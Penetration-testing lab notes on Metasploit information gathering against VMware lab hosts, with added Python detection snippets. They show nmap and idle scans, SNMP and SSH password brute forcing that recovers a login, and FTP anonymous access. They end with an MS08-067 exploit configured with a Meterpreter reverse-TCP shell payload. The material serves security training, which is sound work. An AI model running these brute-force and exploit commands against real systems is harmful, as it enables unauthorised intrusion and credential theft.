[Penetration Testing Notes] MSF Information Gathering

msf5 > db_nmap -sV 192.168.172.130

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

auxiliary/scanner/

List all scanner modules:

msf5 > use auxiliary/scanner    [press Tab twice]

Host discovery

Discovery modules:
msf5 > use auxiliary/scanner/discovery/    [press Tab twice]

use auxiliary/scanner/discovery/arp_sweep                           use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp                           use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping                 use auxiliary/scanner/discovery/udp_sweep

ARP host discovery:
msf5 > use auxiliary/scanner/discovery/arp_sweep
# Set the target range (RHOSTS); accepted forms are 192.168.1.1-192.168.1.20, 192.168.1.1/24, or 192.168.1.1/24,192.168.2.1/24
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# The source IP (SHOST) and source MAC (SMAC) can be overridden with spoofed values
# Use 20 threads
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Finding a zombie host (idle enough, with an incrementing IP ID)
msf5 > use auxiliary/scanner/ip/ipidseq

msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24

msf5 auxiliary(scanner/ip/ipidseq) > set ports 80

msf5 auxiliary(scanner/ip/ipidseq) > set threads 20

msf5 auxiliary(scanner/ip/ipidseq) > run

[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned  30 of 256 hosts (11% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

192.168.172.2 and 192.168.172.130 both have incrementing IPIDs. If one of them is idle enough (not exchanging traffic with other hosts), it can act as a zombie so that the scan is carried out through it instead of directly.

Using nmap to run an idle scan through the zombie:

msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT     STATE SERVICE       VERSION
[*] Nmap: 7/tcp    open  echo
[*] Nmap: 9/tcp    open  discard?
[*] Nmap: 13/tcp   open  daytime?
[*] Nmap: 17/tcp   open  qotd          Windows qotd (English)
[*] Nmap: 19/tcp   open  chargen
[*] Nmap: 53/tcp   open  domain?
[*] Nmap: 80/tcp   open  http          Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 1028/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 1029/tcp open  msrpc         Microsoft Windows RPC
[*] Nmap: 3389/tcp open  ms-wbt-server Microsoft Terminal Service
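The property that ipidseq tested above, seen from the defender's side, as an added example in Python (not the module's or nmap's own code; the thresholds approximate nmap's IP ID classes and are an assumption): classify a sampled IP ID sequence and, for an Incremental host, count how many packets the host leaks between two probes. A host that classes as Incremental with zero leaked packets is exactly what the idle scan above relies on; the mitigation is an IP stack that randomizes or zeroes the IP ID, as modern stacks do.

```python
# Simplified reimplementation (an assumption, not the module's or nmap's own
# code) of the IP ID sequence classes that ipidseq / nmap report.
def _diffs(ids):
    """Increments between consecutive 16-bit IP IDs, wrapping at 65536."""
    return [(b - a) % 65536 for a, b in zip(ids, ids[1:])]

def _byte_swapped(ids):
    """Some stacks write the ID field little-endian: +1 shows up as +256."""
    return [((i & 0xFF) << 8) | (i >> 8) for i in ids]

def ipid_class(ids):
    """Classify a sequence of IP IDs sampled from one host's replies."""
    if len(ids) < 2:
        return "Unknown"
    if all(i == 0 for i in ids):
        return "All zeros"
    d = _diffs(ids)
    if all(x == 0 for x in d):
        return "Constant"
    if all(0 < x < 10 for x in d):
        return "Incremental"
    if all(0 < x < 10 for x in _diffs(_byte_swapped(ids))):
        return "Broken little-endian incremental"
    if any(x > 20000 for x in d):
        return "Randomized"
    return "Random positive increments"

def leaked_packets(ids):
    """For an Incremental host: packets it sent to anyone else between our
    probes. A global counter leaks this, which is what an idle scan reads;
    0 means the host is idle enough to be usable as a zombie."""
    if ipid_class(ids) != "Incremental":
        return None
    return sum(_diffs(ids)) - (len(ids) - 1)
```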

Port scanning (nmap is recommended; it is more efficient)

Scan modules:
msf5 > use auxiliary/scanner/portscan/    [press Tab twice]

use auxiliary/scanner/portscan/ack        use auxiliary/scanner/portscan/syn        use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce  use auxiliary/scanner/portscan/tcp

SYN scan
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run

SNMP scanning

Community string brute force
msf5 > use auxiliary/scanner/snmp/snmp_login

msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135

msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10

msf5 auxiliary(scanner/snmp/snmp_login) > run

A community string with read-only access was recovered:

[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64

Reading information
msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum

msf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135

msf5 auxiliary(scanner/snmp/snmp_enum) > run

[*] System information:

Host IP                       : 192.168.172.135
Hostname                      : bingyi-virtual-machine
Description                   : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact                       : Me <me@example.org>
Location                      : Sitting on the Dock of the Bay
Uptime snmp                   : 11:18:08.39
Uptime system                 : 00:06:23.04
System date                   : 2020-11-9 10:51:42.0

Windows targets:

# Enumerate user accounts
use auxiliary/scanner/snmp/snmp_enumusers
# Enumerate file shares
use auxiliary/scanner/snmp/snmp_enumshares

SMB scanning

Discovery (version detection)
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131

msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.172.131:445   - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Scanning named pipes
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor

msf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131

msf5 auxiliary(scanner/smb/pipe_auditor) > run

Enumerating shares
msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares 

msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131

msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadmin

msf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadmin

msf5 auxiliary(scanner/smb/smb_enumshares) > run

SSH scanning

Discovery

Version scan; an outdated version may have exploitable vulnerabilities.

msf5 > use auxiliary/scanner/ssh/ssh_version 

msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135

msf5 auxiliary(scanner/ssh/ssh_version) > run

[+] 192.168.172.135:22    - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22    - Scanned 1 of 1 hosts (100% complete)

Password brute force
msf5 > use auxiliary/scanner/ssh/ssh_login

msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135

msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyi

msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txt

msf5 auxiliary(scanner/ssh/ssh_login) > set threads 10

msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
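What the ssh_login run above looks like from the target's side, as an added detection example in Python (not part of the original notes): parse sshd password-authentication lines from auth.log, alert when one source accumulates a burst of failures inside a time window, and alert again if that same source then logs in successfully. The log lines are constructed for this example, modelled on the session line above; the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample (not from the page): what sshd on the target writes to
# auth.log while ssh_login cycles through a password list and then hits.
SAMPLE_AUTH_LOG = """\
Nov 11 13:00:09 bingyi-virtual-machine sshd[2101]: Failed password for bingyi from 192.168.172.129 port 35880 ssh2
Nov 11 13:00:10 bingyi-virtual-machine sshd[2103]: Failed password for bingyi from 192.168.172.129 port 35882 ssh2
Nov 11 13:00:10 bingyi-virtual-machine sshd[2105]: Failed password for bingyi from 192.168.172.129 port 35884 ssh2
Nov 11 13:00:11 bingyi-virtual-machine sshd[2107]: Failed password for bingyi from 192.168.172.129 port 35886 ssh2
Nov 11 13:00:12 bingyi-virtual-machine sshd[2109]: Failed password for bingyi from 192.168.172.129 port 35888 ssh2
Nov 11 13:00:13 bingyi-virtual-machine sshd[2115]: Accepted password for bingyi from 192.168.172.129 port 35897 ssh2
Nov 11 13:05:00 bingyi-virtual-machine sshd[2130]: Failed password for invalid user admin from 10.0.0.5 port 40000 ssh2
Nov 11 13:05:02 bingyi-virtual-machine sshd[2131]: Failed password for invalid user admin from 10.0.0.5 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_sshd(text):
    """Yield (timestamp, outcome, user, src); syslog stamps carry no year."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["outcome"], m["user"], m["src"]

def detect_bruteforce(text, threshold=5, window_s=60):
    """Alert once per source when `threshold` failures fall inside
    `window_s` seconds, and again if that source then logs in."""
    fails = defaultdict(list)   # src -> failure timestamps inside the window
    flagged = set()
    alerts = []
    for ts, outcome, user, src in parse_sshd(text):
        if outcome == "Failed":
            q = fails[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.pop(0)
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, user))
        elif src in flagged:
            alerts.append(("success_after_bruteforce", src, user))
    return alerts
```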

Private key brute force
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey 

msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135

msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show options

msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txt

msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run

FTP

Version scan
msf5 > use auxiliary/scanner/ftp/ftp_version 

msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131

msf5 auxiliary(scanner/ftp/ftp_version) > run

[+] 192.168.172.131:21    - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)

Trying anonymous login
msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous 

msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131

msf5 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.172.131:21    - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21    - Scanned 1 of 1 hosts (100% complete)

Password cracking

Windows: using an already-obtained shell to collect the target's missing patches

Get a shell, then migrate it into another process

msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130

msf5 exploit(windows/smb/ms08_067_netapi) > set target 34

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > run -j
# Interact with the session
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 2
# Show the process the shell is currently running in
meterpreter > getpid